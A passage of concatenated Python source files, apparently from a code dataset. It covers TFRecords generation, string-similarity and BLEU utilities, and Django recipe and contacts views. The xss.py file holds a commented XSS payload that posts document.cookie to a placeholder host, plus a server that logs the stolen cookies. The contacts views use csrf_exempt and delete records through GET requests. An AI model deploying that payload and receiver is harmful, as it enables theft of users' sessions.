#pl.imshow(boundry[:,:,0])\n #pl.show()\n #pl.imshow(boundry[:,:,1])\n #pl.show()\n \n return boundry\n \n\ndef generate_tfrecords(seq_length, num_runs, shape, frame_num, dir_name):\n\n if not tf.gfile.Exists(FLAGS.data_dir + 'tfrecords/' + dir_name):\n tf.gfile.MakeDirs(FLAGS.data_dir + 'tfrecords/' + dir_name)\n\n print('generating records')\n for run in tqdm(xrange(num_runs)):\n filename = FLAGS.data_dir + 'tfrecords/' + dir_name + '/run_' + str(run) + '_seq_length_' + str(seq_length) + '.tfrecords'\n \n tfrecord_filename = glb(FLAGS.data_dir + 'tfrecords/' + dir_name + '/*') \n\n if filename not in tfrecord_filename:\n \n writer = tf.python_io.TFRecordWriter(filename)\n \n \n mat_filenames = glb('../systems/store_' + dir_name + '/sam' + str(run) + '/run*')\n num_samples = len(mat_filenames)\n \n # first calc boundry\n boundry_cond = load_boundry('../systems/store_' + dir_name + '/sam' + str(run) + '/run', shape, frame_num)\n boundry_cond = np.float32(boundry_cond)\n boundry_flat = boundry_cond.reshape([1,shape[0]*shape[1]*2])\n boundry_raw = boundry_flat.tostring()\n\n # save tf records\n ind_dat = 0\n while ind_dat < (num_samples - seq_length - 1):\n print(\"read!\")\n seq_frames = np.zeros((seq_length,shape[0],shape[1],frame_num))\n for i in xrange(seq_length):\n flow_state = load_flow('../systems/store_' + dir_name + '/sam' + str(run) + '/run' + str(i+ind_dat+1) + '.data', shape, frame_num)\n flow_state = np.float32(flow_state)\n seq_frames[i, :, :, :] = flow_state \n ind_dat = ind_dat + 1\n seq_frames = np.float32(seq_frames)\n seq_frames_flat = seq_frames.reshape([1,seq_length*shape[0]*shape[1]*frame_num])\n seq_frame_raw = seq_frames_flat.tostring()\n # create example and write it\n example = tf.train.Example(features=tf.train.Features(feature={\n 'flow': _bytes_feature(seq_frame_raw),\n 'boundry': _bytes_feature(boundry_raw)})) \n writer.write(example.SerializeToString()) \n \n \n","sub_path":"systems/fluid_createTFRecords.py","file_name":"fluid_createTFRecords.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"651964395","text":"# Copyright (c) 2018-present, Ahmed H. Al-Ghidani.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n#\n\n__author__ = \"Ahmed H. Al-Ghidani\"\n__copyright__ = \"Copyright 2018, The mleus Project, https://github.com/AhmedHani/mleus\"\n__license__ = \"BSD 3-Clause License\"\n__maintainer__ = \"Ahmed H. Al-Ghidani\"\n__email__ = \"ahmed.hani.ibrahim@gmail.com\"\n\nimport string\nfrom scipy import spatial\nimport collections\nimport math\n\n\ndef maximum_matching(list1, list2):\n list1.sort()\n list2.sort()\n\n counter = 0\n\n for item1 in list1:\n for item2 in list2:\n if item1 == item2:\n counter += 1\n\n return counter\n\n\n# https://rosettacode.org/wiki/Levenshtein_distance#Python\n#print(levenshteinDistance([\"kiten\"], [\"kiten\", \"kitten\", \"fdf\", \"dfu\"]))\n#print(levenshteinDistance(\"rosettacode\", \"raisethysword\"))\ndef levenshtein_distance(str1, str2):\n m = len(str1)\n n = len(str2)\n lensum = float(m + n)\n d = []\n for i in range(m + 1):\n d.append([i])\n del d[0][0]\n for j in range(n + 1):\n d[0].append(j)\n for j in range(1, n + 1):\n for i in range(1, m + 1):\n if str1[i - 1] == str2[j - 1]:\n d[i].insert(j, d[i - 1][j - 1])\n else:\n minimum = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + 2)\n d[i].insert(j, minimum)\n ldist = d[-1][-1]\n ratio = (lensum - ldist) / lensum\n\n return {'distance': ldist, 'ratio': ratio}\n\n\ndef cosine_distance(list1, list2):\n distance = 1 - spatial.distance.cosine(list(list1), list(list2))\n\n return distance\n\n\ndef compute_bleu(reference_corpus, translation_corpus, max_order=4, smooth=False):\n # Copyright 2017 Google Inc. All Rights Reserved.\n #\n # Licensed under the Apache License, Version 2.0 (the \"License\");\n # you may not use this file except in compliance with the License.\n # You may obtain a copy of the License at\n #\n # http://www.apache.org/licenses/LICENSE-2.0\n #\n # Unless required by applicable law or agreed to in writing, software\n # distributed under the License is distributed on an \"AS IS\" BASIS,\n # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n # See the License for the specific language governing permissions and\n # limitations under the License.\n # ==============================================================================\n\n \"\"\"Computes BLEU score of translated segments against one or more references.\n\n Args:\n reference_corpus: list of lists of references for each translation. Each\n reference should be tokenized into a list of tokens.\n translation_corpus: list of translations to score. Each translation\n should be tokenized into a list of tokens.\n max_order: Maximum n-gram order to use when computing BLEU score.\n smooth: Whether or not to apply Lin et al. 2004 smoothing.\n\n Returns:\n 3-Tuple with the BLEU score, n-gram precisions, geometric mean of n-gram\n precisions and brevity penalty.\n \"\"\"\n\n def _get_ngrams(segment, max_order):\n \"\"\"Extracts all n-grams upto a given maximum order from an input segment.\n\n Args:\n segment: text segment from which n-grams will be extracted.\n max_order: maximum length in tokens of the n-grams returned by this\n methods.\n\n Returns:\n The Counter containing all n-grams upto max_order in segment\n with a count of how many times each n-gram occurred.\n \"\"\"\n ngram_counts = collections.Counter()\n for order in range(1, max_order + 1):\n for i in range(0, len(segment) - order + 1):\n ngram = tuple(segment[i:i + order])\n ngram_counts[ngram] += 1\n return ngram_counts\n\n\n matches_by_order = [0] * max_order\n possible_matches_by_order = [0] * max_order\n reference_length = 0\n translation_length = 0\n for (references, translation) in zip(reference_corpus,\n translation_corpus):\n reference_length += min(len(r) for r in references)\n translation_length += len(translation)\n\n merged_ref_ngram_counts = collections.Counter()\n for reference in references:\n merged_ref_ngram_counts |= _get_ngrams(reference, max_order)\n translation_ngram_counts = _get_ngrams(translation, max_order)\n overlap = translation_ngram_counts & merged_ref_ngram_counts\n for ngram in overlap:\n matches_by_order[len(ngram)-1] += overlap[ngram]\n for order in range(1, max_order+1):\n possible_matches = len(translation) - order + 1\n if possible_matches > 0:\n possible_matches_by_order[order-1] += possible_matches\n\n precisions = [0] * max_order\n for i in range(0, max_order):\n if smooth:\n precisions[i] = ((matches_by_order[i] + 1.) /\n (possible_matches_by_order[i] + 1.))\n else:\n if possible_matches_by_order[i] > 0:\n precisions[i] = (float(matches_by_order[i]) /\n possible_matches_by_order[i])\n else:\n precisions[i] = 0.0\n\n if min(precisions) > 0:\n p_log_sum = sum((1. / max_order) * math.log(p) for p in precisions)\n geo_mean = math.exp(p_log_sum)\n else:\n geo_mean = 0\n\n ratio = float(translation_length) / reference_length\n\n if ratio > 1.0:\n bp = 1.\n else:\n bp = math.exp(1 - 1. / ratio)\n\n bleu = geo_mean * bp\n\n return (bleu, precisions, bp, ratio, translation_length, reference_length)\n","sub_path":"mleus/utils/algorithm_utils.py","file_name":"algorithm_utils.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612673254","text":"from django.conf import settings\nfrom django_mako_plus import view_function\nfrom homepage.models import Recipe, Category\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\n\n@view_function\n@login_required(login_url='/account/login/')\ndef process_request(request, recipe:Recipe):\n\n if recipe.owner != request.user:\n return HttpResponseRedirect('/homepage/index')\n \n # for POST requests\n if(request.method == \"POST\"):\n form = EditRecipeForm(request.POST)\n \n if(form.is_valid()):\n form.commit(recipe)\n return HttpResponseRedirect('/homepage/recipe/'+str(recipe.id))\n \n # for GET requests show the blank form\n else:\n form = EditRecipeForm(initial=model_to_dict(recipe))\n \n context = {\n 'form': form,\n 'recipe': recipe\n }\n\n return request.dmp.render('edit.html', context)\n\n\nclass EditRecipeForm(forms.Form):\n name = forms.CharField(label='* Recipe Title', required=True)\n ingredients = forms.CharField(label=\"* Ingredients\",widget=forms.Textarea(attrs={'rows': 4}), required=True)\n steps = forms.CharField(label=\"* Steps\",widget=forms.Textarea(attrs={'rows': 4}), required=True)\n category = forms.ModelChoiceField(label=\"* Category\", queryset=Category.objects.all(), empty_label=None)\n notes = forms.CharField(label=\"Notes\", widget=forms.Textarea(attrs={'rows': 2}), required=False)\n link = forms.URLField(label='URL', required=False)\n image_link = forms.URLField(label='Image URL', required=False)\n \n def commit(self, r):\n r.name = self.cleaned_data.get('name')\n r.ingredients = self.cleaned_data.get('ingredients')\n r.steps = self.cleaned_data.get('steps')\n r.category = self.cleaned_data.get('category')\n r.link = self.cleaned_data.get('link')\n r.notes = self.cleaned_data.get('notes')\n r.image_link = self.cleaned_data.get('image_link')\n r.save()","sub_path":"homepage/views/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"365652181","text":"# document.cookie=\"name=\"\n# $.post('http://IP/cookie', {cookie: document.cookie});\n\n#!usr/bin/env python3\n# coding: utf8\n\nimport urllib, datetime\nfrom http.server import (HTTPServer, BaseHTTPRequestHandler)\n\nclass CustomRequestHandler(BaseHTTPRequestHandler):\n\tdef do_POST(self):\n\t\tlength = int(self.headers['Content-Length'])\n\t\tcontent = self.rfile.read(length)\n\t\tdata = urllib.parse.parse_qs(content.decode('utf-8'))\n\n\t\tprint('FROM : {0} AT : {1}'.format(self.headers['Referer'], str(datetime.datetime.now())[:-7]))\n\n\t\tif self.path == '/cookie':\n\t\t\tprint('COOKIE : \\u2193 \\n{0}'.format(data['cookie'][0]))\n\t\telse:\n\t\t\tself.send_response(200)\n\t\t\tself.send_header('Access-Control-Allow-Origin', '*')\n\t\t\tself.end_headers()\n\ndef main():\n\tserver_class = HTTPServer\n\thandler_class = CustomRequestHandler\n\tserver_address = ('IP', 2020)\n\thttpd = server_class(server_address, handler_class)\n\thttpd.serve_forever()\n\nif __name__ == '__main__':\n\tmain()","sub_path":"xss.py","file_name":"xss.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"436092235","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom home.models import Person, Address, Phone, Email, Groups\nfrom django.shortcuts import redirect\n\n\n# DELETE\nclass Main(View):\n def __init__(self):\n self.message = ''\n\n def get(self, request, *args, **kwargs):\n people = Person.objects.order_by('surname')\n return render(request, 'main.html', {\"people\": people,\n \"message\": self.message})\n\n\nclass DeleteContact(Main):\n def get(self, request, id):\n t = Person.objects.filter(id=id)\n t.delete()\n self.message = \"We have just deleted this contact\"\n return super().get(request)\n\n\n# MODIFY/DEL\nclass ConDetailsMain(View):\n def __init__(self):\n self.message = ''\n\n def get(self, request, id, *args, **kwargs):\n person_details = Person.objects.filter(id=id)\n address_details = Address.objects.filter(id=id)\n phone_details = Phone.objects.filter(person_id=id)\n email_details = Email.objects.filter(person_id=id)\n return render(request, 'showdetails.html', {\"person_details\": person_details,\n \"address_details\": address_details,\n \"phone_details\": phone_details,\n \"email_details\": email_details\n\n })\n\n\nclass DeleteDescription(ConDetailsMain):\n def get(self, request, id):\n t = Person.objects.get(id=id)\n t.description = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteCity(ConDetailsMain):\n def get(self, request, id):\n t = Address.objects.get(id=id)\n t.city = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteStreet(ConDetailsMain):\n def get(self, request, id):\n t = Address.objects.get(id=id)\n t.street = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteHouseNumber(ConDetailsMain):\n def get(self, request, id):\n t = Address.objects.get(id=id)\n t.house_number = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteFlatNumber(ConDetailsMain):\n def get(self, request, id):\n t = Address.objects.get(id=id)\n t.flat_number = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeletePhoneNumber(ConDetailsMain):\n def get(self, request, id):\n t = Phone.objects.get(person_id=id)\n t.phone_number = None\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeletePhoneType(ConDetailsMain):\n def get(self, request, id):\n t = Phone.objects.get(person_id=id)\n t.phone_type = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteEmail(ConDetailsMain):\n def get(self, request, id):\n t = Email.objects.get(person_id=id)\n t.email = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass DeleteEmailType(ConDetailsMain):\n def get(self, request, id):\n t = Email.objects.get(person_id=id)\n t.email_type = ''\n t.save()\n return redirect('/showdetails/{}'.format(id))\n\n\nclass EditContact(Main):\n @method_decorator(csrf_exempt)\n def dispatch(self, *args, **kwargs):\n return super().dispatch(*args, **kwargs)\n\n def get(self, request, id):\n t = Person.objects.get(id=id)\n a = Address.objects.get(person_id=id)\n p = Phone.objects.get(person_id=id)\n e = Email.objects.get(person_id=id)\n\n form = \"\"\"
\n \n \n \n \n \n